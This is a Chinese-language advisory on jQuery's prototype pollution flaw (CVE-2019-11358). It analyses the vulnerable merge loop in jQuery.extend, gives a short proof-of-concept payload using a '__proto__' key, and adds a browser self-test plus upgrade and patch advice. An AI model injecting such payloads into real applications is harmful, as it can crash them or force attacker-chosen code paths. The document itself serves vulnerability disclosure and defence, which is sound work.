JQuery原型污染漏洞-CVE-2019-11358

漏洞概述

       原型污染漏洞指的是攻击者修改 JavaScript对象原型的能力。JavaScript对象就像变量一样，但存储的并非一个值 (var car = “
Fiat”)，而是能够包含基于预设结构的多个值（var car ={type:"Fiat", model:"500", color:"white"}）。
       原型定义了JavaScript 对象的默认结构和默认值，因此当未设置值时，应用程序不会崩溃。原型污染攻击可导致攻击者覆写
JavaScript 应用程序对象原型。由攻击者控制的属性可被注入对象，之后或经由触发JavaScript异常引发拒绝服务，或篡改该应用
程序源代码从而强制执行攻击者注入的代码路径。
       漏洞本身是高危漏洞，但利用难度比较大。原型污染漏洞并未可大规模被利用的漏洞，因为漏洞要利用成功，需要攻击者非常了解
具体代码的结构，需要攻击者深入了解每个网站和对象原型的运作方式以及这些原型如何在庞大的图式中进行分解，然后构造合适
的利用方法才能成功。一般闭源的网站系统，攻击者很难深入了解从而构造利用代码，所以几乎不受此漏洞攻击。

漏洞验证
漏洞POC：https://github.com/jquery/jquery/pull/4333。
漏洞分析如下：
./src/core.js 第155行：
if ((options = arguments[ i ]) != null) {
options 取传入的参数 arguments[i]，而后第158 、159 行：
for (name in options) {                      
     copy= options [name];
name、copy值进而可以受输入控制。
最后，在第183行：
target[name] = jQuery.extend (deep,clone,copy);
在第187行：
target[name] = copy;
如果name可以为__proto__，则会向上影响target的原型，进而覆盖造成原型污染。
target 在第127行：
target = arguments[ 0 ] || {}

漏洞复现

var jquery = document.createElement('script');
jquery.src = 'https://code.jquery.com/jquery-3.3.1.min.js';

let exp = $.extend(true, {}, JSON.parse('{"__proto__": {"exploit": "h3rmesk1t"}}'));
console.log({}.exploit)

测试您的网站
要了解您的应用程序是否存在漏洞和/或是否正确应用了修复程序，您可以在浏览器的开发人员控制台中执行以下代码：

var maliciousJson = '{ "myProperty" : "a", "__proto__" : { "isVulnerable" : true } }'; var testObject = jQuery.extend(true, {}, JSON.parse(maliciousJson )); if (typeof {}.isVulnerable !== 'undefined' && {}.isVulnerable === true) { alert("Bad news :(\nYou're (still) vulnerable to Prototype Pollution") } else { alert("All Good! :)\nYou're NOT vulnerable (anymore) to Prototype Pollution") }

点击回车键，弹出警告，表明当前您的网站不受该威胁：

修复建议
（1）jQuery version 3.x 修复方案
升级到最新的3.4.0版本：https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/。
（2）jQuery version 2.x和1.x 修复方案
补丁链接：https://github.com/DanielRuf/snyk-js-jquery-174006?files=1。

参考信息

https://xz.aliyun.com/t/11272

https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/

https://www.infosecmatter.com/nessus-plugin-library/?id=124719